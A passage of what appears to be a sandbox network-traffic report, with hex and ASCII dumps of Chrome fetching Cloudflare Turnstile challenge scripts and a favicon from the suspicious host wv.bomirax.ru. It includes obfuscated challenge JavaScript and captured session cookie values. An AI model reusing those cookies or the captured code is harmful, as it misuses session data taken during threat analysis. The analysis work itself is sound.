                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                          Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                          Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.449761104.18.95.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:28 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9020d7826b0a4252&lang=auto HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:28 UTC331INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:28 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 109096
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d78679a242ad-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:28 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65
                                                                          Data Ascii: 0or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_overrun_description":"Stuck%20here%3F","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 2c 66 4b 2c 66 4c 2c 66 56 2c 67 36 2c 67 61 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 36 33 33 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 32 32 32 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 36 36 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 35 36 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 32 32 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 37 38 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 32 38 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 32 34 29
                                                                          Data Ascii: ,fK,fL,fV,g6,ga,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(633))/1+parseInt(gI(222))/2+parseInt(gI(466))/3+parseInt(gI(1356))/4+parseInt(gI(622))/5+-parseInt(gI(578))/6*(-parseInt(gI(1228))/7)+-parseInt(gI(424)
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 69 28 37 32 37 29 5d 5b 68 69 28 38 34 34 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 69 28 31 31 36 32 29 5d 3b 6f 5b 68 69 28 38 39 32 29 5d 21 3d 3d 68 69 28 35 33 31 29 3f 28 44 3d 78 5b 43 5d 2c 45 3d 66 31 28 67 2c 68 2c 44 29 2c 6f 5b 68 69 28 37 39 38 29 5d 28 42 2c 45 29 29 3f 28 46 3d 27 73 27 3d 3d 3d 45 26 26 21 67 5b 68 69 28 31 35 37 29 5d 28 68 5b 44 5d 29 2c 68 69 28 31 34 30 39 29 3d 3d 3d 69 2b 44 3f 73 28 69 2b 44 2c 45 29 3a 46 7c 7c 6f 5b 68 69 28 33 35 37 29 5d 28 73 2c 69 2b 44 2c 68 5b 44 5d 29 29 3a 6f 5b 68 69 28 33 35 37 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 6a 28 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 68 6a 29 7b 68 6a 3d 68
                                                                          Data Ascii: .split('A'),B=B[hi(727)][hi(844)](B),C=0;C<x[hi(1162)];o[hi(892)]!==hi(531)?(D=x[C],E=f1(g,h,D),o[hi(798)](B,E))?(F='s'===E&&!g[hi(157)](h[D]),hi(1409)===i+D?s(i+D,E):F||o[hi(357)](s,i+D,h[D])):o[hi(357)](s,i+D,E):j(),C++);return j;function s(G,H,hj){hj=h
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 68 6e 28 31 30 31 38 29 5d 28 27 27 29 7d 2c 65 4d 5b 67 4a 28 31 33 38 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 70 2c 64 2c 65 2c 66 2c 67 29 7b 68 70 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 68 70 28 31 32 38 37 29 5d 3d 68 70 28 32 35 30 29 2c 64 5b 68 70 28 35 30 37 29 5d 3d 68 70 28 31 33 30 36 29 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 68 70 28 37 32 38 29 5d 5b 68 70 28 31 34 33 33 29 5d 28 32 3c 3c 66 2c 33 32 29 2c 65 4d 5b 68 70 28 32 31 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 71 29 7b 68 71 3d 68 70 2c 65 4d 5b 68 71 28 36 31 39 29 5d 26 26 28 65 4d 5b 68 71 28 31 31 39 30 29 5d 5b 68 71 28 39 31 30 29 5d 28 29 2c 65 4d 5b 68 71 28 31 31 39 30 29 5d 5b 68 71 28 31 30 30 37 29 5d 28 29 2c 65 4d 5b 68 71 28 38 39 33 29 5d 3d 21 21 5b 5d
                                                                          Data Ascii: hn(1018)]('')},eM[gJ(1380)]=function(hp,d,e,f,g){hp=gJ,d={},d[hp(1287)]=hp(250),d[hp(507)]=hp(1306),e=d,f=1,g=1e3*eM[hp(728)][hp(1433)](2<<f,32),eM[hp(213)](function(hq){hq=hp,eM[hq(619)]&&(eM[hq(1190)][hq(910)](),eM[hq(1190)][hq(1007)](),eM[hq(893)]=!![]
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 27 35 27 3a 42 5b 68 72 28 39 32 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 42 5b 68 72 28 36 38 36 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 42 5b 68 72 28 31 30 30 39 29 5d 28 6b 5b 68 72 28 36 39 38 29 5d 28 27 76 5f 27 2b 65 4d 5b 68 72 28 33 39 37 29 5d 5b 68 72 28 32 38 32 29 5d 2b 27 3d 27 2c 78 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 42 3d 6e 65 77 20 65 4d 5b 28 68 72 28 36 32 31 29 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 39 27 3a 42 5b 68 72 28 31 34 31 30 29 5d 28 6b 5b 68 72 28 39 37 31 29 5d 2c 68 72 28 36 35 34 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 30 27 3a 43 3d 68 72 28 31 30 32 37 29 3b 63 6f 6e 74
                                                                          Data Ascii: '5':B[hr(926)]=function(){};continue;case'6':B[hr(686)]=5e3;continue;case'7':B[hr(1009)](k[hr(698)]('v_'+eM[hr(397)][hr(282)]+'=',x));continue;case'8':B=new eM[(hr(621))]();continue;case'9':B[hr(1410)](k[hr(971)],hr(654));continue;case'10':C=hr(1027);cont
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 3d 68 73 2c 65 5b 68 74 28 37 38 37 29 5d 28 78 29 7d 7d 2c 76 3d 69 5b 68 73 28 33 36 30 29 5d 2c 76 26 26 65 5b 68 73 28 31 39 37 29 5d 28 76 5b 68 73 28 31 31 38 32 29 5d 2c 68 73 28 32 35 30 29 29 26 26 65 5b 68 73 28 31 30 39 30 29 5d 28 76 5b 68 73 28 31 30 33 30 29 5d 2c 68 73 28 31 32 39 32 29 29 3f 6f 3d 65 5b 68 73 28 37 35 34 29 5d 28 73 2c 66 75 6e 63 74 69 6f 6e 28 68 75 29 7b 68 75 3d 68 73 2c 73 5b 68 75 28 37 37 37 29 5d 28 78 29 7d 2c 31 65 33 29 3a 76 26 26 76 5b 68 73 28 31 31 38 32 29 5d 3d 3d 3d 68 73 28 32 35 30 29 26 26 65 5b 68 73 28 39 37 30 29 5d 28 76 5b 68 73 28 31 30 33 30 29 5d 2c 68 73 28 31 31 39 38 29 29 26 26 65 5b 68 73 28 36 38 37 29 5d 28 78 2c 42 29 29 29 29 3a 66 3d 4a 53 4f 4e 5b 68 73 28 32 37 33 29 5d 28 64 29 3b
                                                                          Data Ascii: =hs,e[ht(787)](x)}},v=i[hs(360)],v&&e[hs(197)](v[hs(1182)],hs(250))&&e[hs(1090)](v[hs(1030)],hs(1292))?o=e[hs(754)](s,function(hu){hu=hs,s[hu(777)](x)},1e3):v&&v[hs(1182)]===hs(250)&&e[hs(970)](v[hs(1030)],hs(1198))&&e[hs(687)](x,B)))):f=JSON[hs(273)](d);
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 45 2b 3d 28 48 2f 3d 32 29 2a 6b 5b 68 77 28 36 37 37 29 5d 28 6b 5b 68 77 28 31 31 30 37 29 5d 28 46 2c 47 29 2c 31 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 45 2b 3d 6b 5b 68 77 28 36 36 33 29 5d 28 48 2f 3d 32 2c 49 3e 3e 32 2e 39 34 26 31 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 6a 3d 47 5b 68 77 28 31 38 30 29 5d 28 32 2c 6b 5b 68 77 28 31 30 32 32 29 5d 28 6b 5b 68 77 28 31 33 32 32 29 5d 28 6b 5b 68 77 28 38 39 38 29 5d 28 6b 5b 68 77 28 36 37 37 29 5d 28 46 2c 32 35 35 29 2c 34 29 2c 49 3e 3e 34 29 2c 31 30 32 33 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 45 2b 3d 6b 5b 68 77 28 36 36 33 29 5d 28 48 2f 3d 32 2c 6b 5b 68 77 28 33 37 30 29 5d 28 49 3e 3e 2e 32 35 2c 31 29 29 3b 63 6f 6e 74 69 6e 75 65
                                                                          Data Ascii: E+=(H/=2)*k[hw(677)](k[hw(1107)](F,G),1);continue;case'2':E+=k[hw(663)](H/=2,I>>2.94&1);continue;case'3':j=G[hw(180)](2,k[hw(1022)](k[hw(1322)](k[hw(898)](k[hw(677)](F,255),4),I>>4),1023));continue;case'4':E+=k[hw(663)](H/=2,k[hw(370)](I>>.25,1));continue
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 29 7d 2c 31 65 33 29 3a 67 26 26 67 5b 69 69 28 31 31 38 32 29 5d 3d 3d 3d 69 69 28 32 35 30 29 26 26 67 5b 69 69 28 31 30 33 30 29 5d 3d 3d 3d 69 69 28 31 31 39 38 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 4a 29 7d 29 2c 66 4c 3d 21 5b 5d 2c 21 66 63 28 67 4a 28 37 34 33 29 29 26 26 28 67 39 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 52 2c 63 2c 64 2c 65 29 7b 69 52 3d 67 4a 2c 63 3d 7b 27 53 59 63 48 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 7d 2c 64 3d 65 4d 5b 69 52 28 33 39 37 29 5d 5b 69 52 28 31 39 38 29 5d 7c 7c 31 65 34 2c 65 3d 67 37 28 29 2c 21 65 4d 5b 69 52 28 38 39 33 29 5d 26 26 21 63 5b 69 52 28 35 35 38 29 5d 28 66 4d 29 26 26 21 65 4d 5b 69 52 28 31 31 39 30
                                                                          Data Ascii: )},1e3):g&&g[ii(1182)]===ii(250)&&g[ii(1030)]===ii(1198)&&clearInterval(fJ)}),fL=![],!fc(gJ(743))&&(g9(),setInterval(function(iR,c,d,e){iR=gJ,c={'SYcHL':function(f){return f()}},d=eM[iR(397)][iR(198)]||1e4,e=g7(),!eM[iR(893)]&&!c[iR(558)](fM)&&!eM[iR(1190
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4a 55 65 61 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 66 50 50 72 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 64 77 61 45 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4d 69 46 49 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 6d 77 46 59 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 4d 66 46 49 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 51 70 42 50 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72
                                                                          Data Ascii: nction(h,i){return h<i},'JUeal':function(h,i){return h<<i},'fPPrc':function(h,i){return i==h},'dwaEi':function(h,i){return h<<i},'MiFIm':function(h,i){return i&h},'mwFYJ':function(h,i){return h&i},'MfFIL':function(h,i){return i==h},'QpBPo':function(h,i){r


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.449762104.18.95.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:28 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:28 UTC240INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:28 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          cache-control: max-age=2629800, public
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d786fcbf8c11-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:28 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.449750104.21.96.14434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:29 UTC1314OUTGET /favicon.ico HTTP/1.1
                                                                          Host: wv.bomirax.ru
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://wv.bomirax.ru/Z1cxl9eG/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkdCOVdRZ1VXdlBVR2l6TlFJWEJyUkE9PSIsInZhbHVlIjoiTC9PZ2ZseC81blhSOHJaZ21RaTdSWndoWWJzYUIwZHVsTWhyQ1FNMUhXZTI5ZE1tNSs1bEVFdm9ZazRwMS9PajVOcTloSGZoMlJYbEpzajA5S0M4eW01c2JCdUE0eVU5Rmg4WnIrQTM4TUlKNnVTWFMyYkVCNnloN0dVYTB5dEMiLCJtYWMiOiI3ZTY1NGEwNmFkZmNkNWU4NDkxZmE0MzI3NjA0N2IzNDE3MDZiMDVlMTAxNjBkYzZiMzgwOWFhMWI5YWFiMmU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlpRYlZuSE5McEdNR0VFZXdLRUFXeXc9PSIsInZhbHVlIjoiUTZMZEtPUFBoYm9FZFJ0OWpxRkdVSGh0alVwVlpyNW1Ddkx6dHZMcE1nNTA1SFF3d0YyMmZBalFGYkxvaFpYUFRvRnpPN2YxRUw1azlhTnlIdTVpS2hCODQ0d3hWanViZ1JBNWE5OUNRYWw1Z20xR2lyMFhYUTRablV3YkpJZGUiLCJtYWMiOiI2MTA1NmQ4OTVlZWRlNjBmZDRjMjhlYzAyZjBiZGI0NTc3ZWNmY2NjMWYxYzQ4MGVkZWRmNTM5ZjczYjlmNGJlIiwidGFnIjoiIn0%3D
                                                                          2025-01-14 21:50:29 UTC1073INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 14 Jan 2025 21:50:29 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: max-age=14400
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VBdI44kQ3SIo4qhmrwYt25vhYAXWUuuqAzxzgUS8%2Fp4BtIc7WnRuSYREC%2Fy9FGJSdjPn%2F8uVjalVJ%2F0aYtZkpEh%2F8hb8ughRK8HRDQ2XjGRGYlundQYwvH8cZPfclQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1262&min_rtt=1253&rtt_var=488&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2096&delivery_rate=2149433&cwnd=251&unsent_bytes=0&cid=9c4792e6ae7f86b5&ts=402&x=0"
                                                                          CF-Cache-Status: HIT
                                                                          Age: 11827
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d788cb821a48-EWR
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2025&rtt_var=761&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1892&delivery_rate=1436301&cwnd=157&unsent_bytes=0&cid=91ec52b907980ffe&ts=3720&x=0"
                                                                          2025-01-14 21:50:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.449764104.18.94.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:29 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:29 UTC240INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:29 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          cache-control: max-age=2629800, public
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d78ae9d54316-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:29 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.449765104.18.94.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:29 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9020d7826b0a4252&lang=auto HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:29 UTC331INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:29 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 124576
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d78b7bc5c354-EWR
                                                                          alt-svc: h3=":443"; ma=86400
